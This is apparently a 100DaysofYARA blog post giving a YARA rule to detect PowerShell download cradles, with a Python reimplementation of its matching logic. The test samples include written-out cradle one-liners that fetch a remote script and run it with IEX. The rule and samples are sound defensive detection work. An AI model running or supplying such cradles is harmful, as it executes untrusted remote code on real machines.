There are so many ways to obfuscate PowerShell commands that this might seem like a bit of a waste of time, but today's rule attempts to find simple, unobfuscated PowerShell download cradles: one-liners that fetch a remote script and execute it in memory.
rule TTP_PowerShell_Download_command {
    meta:
        description = "Matches strings commonly found in PowerShell download cradles."
        last_modified = "2024-02-20"
        author = "@petermstewart"
        DaysofYara = "51/100"
        ref = "https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters"
    strings:
        // nocase: case-insensitive; ascii wide: match both single-byte and UTF-16LE encodings
        $a = "powershell" nocase ascii wide
        $b = "IEX" nocase ascii wide
        $c = "New-Object" nocase ascii wide
        $d = "Net.Webclient" nocase ascii wide
        $e = ".downloadstring(" nocase ascii wide
    condition:
        // any four of the five strings must be present for the rule to fire
        4 of them
}
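To show what the rule's `nocase ascii wide` modifiers and the `4 of them` threshold actually do, here is an added pure-Python approximation of the matching logic, run over a few constructed sample command lines. This is example code written for this post, not part of the YARA rule or the author's repository; it reimplements only the subset of YARA semantics the rule uses (ASCII-only case folding, single-byte and UTF-16LE variants of each string) and the sample inputs, including the `example.invalid` URL, are constructed.

```python
"""Approximation of TTP_PowerShell_Download_command in plain Python.

Demonstrates:
  * nocase  -> ASCII-only case-insensitive comparison (bytes.lower()), as YARA does
  * ascii   -> the string as single-byte text
  * wide    -> the string as UTF-16LE (how PowerShell script blocks and
               -EncodedCommand payloads often appear in memory or logs)
  * 4 of them -> any four of the five strings is enough to fire
"""
from typing import Dict, List, Tuple

# The five strings from the YARA rule, keyed by their identifier.
CRADLE_STRINGS: Dict[str, str] = {
    "a": "powershell",
    "b": "IEX",
    "c": "New-Object",
    "d": "Net.Webclient",
    "e": ".downloadstring(",
}
MIN_MATCHES = 4  # the rule's "4 of them"


def string_variants(pattern: str) -> List[Tuple[str, bytes]]:
    """Return the (encoding, lowercase bytes) forms the rule would search for."""
    low = pattern.lower()
    return [("ascii", low.encode("ascii")), ("wide", low.encode("utf-16-le"))]


def matched_strings(data: bytes) -> Dict[str, str]:
    """Map each matched string id to the encoding it was found in.

    bytes.lower() folds only ASCII letters, which mirrors YARA's nocase; in
    UTF-16LE data the interleaved 0x00 bytes are untouched, so the wide
    variant still lines up after folding.
    """
    hay = data.lower()
    hits: Dict[str, str] = {}
    for name, pattern in CRADLE_STRINGS.items():
        for encoding, needle in string_variants(pattern):
            if needle in hay:
                hits[name] = encoding
                break
    return hits


def rule_matches(data: bytes) -> bool:
    """True when at least MIN_MATCHES of the five strings are present."""
    return len(matched_strings(data)) >= MIN_MATCHES


# Constructed sample inputs (not real telemetry); the URL host is a reserved name.
SAMPLES: Dict[str, bytes] = {
    # classic cradle as it would appear in a command line: all five strings, ASCII
    "ascii_cradle": (
        b"powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
        b".DownloadString('http://example.invalid/a.ps1')\""
    ),
    # the same cradle UTF-16LE encoded, as script-block text is often stored
    "wide_cradle": (
        "powershell IEX (New-Object Net.WebClient)"
        ".DownloadString('http://example.invalid/a.ps1')"
    ).encode("utf-16-le"),
    # fetches text but never executes it: 4 of 5 strings, so the rule still fires
    # (a false-positive source worth knowing about when tuning the threshold)
    "fetch_only": (
        b"powershell -c \"(New-Object Net.WebClient)"
        b".DownloadString('http://example.invalid/version.txt')\""
    ),
    # ordinary admin one-liner: none of the strings
    "benign": b"Get-Process | Where-Object { $_.CPU -gt 100 }",
}


def scan_samples() -> Dict[str, Tuple[bool, Dict[str, str]]]:
    """Run the approximated rule over every sample and return verdict plus hits."""
    return {name: (rule_matches(data), matched_strings(data)) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, (fired, hits) in scan_samples().items():
        print(f"{name:13} fired={fired!s:5} hits={hits}")
```

The `fetch_only` sample is the caveat a practitioner will care about: because the condition is `4 of them` rather than requiring `$b` (`IEX`), a script that only reads a remote string will also trigger the rule, so this is better treated as a hunting or triage signal than a high-confidence alert.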
Find the rest of my 100DaysofYARA posts here, and the rules themselves on my GitHub repository.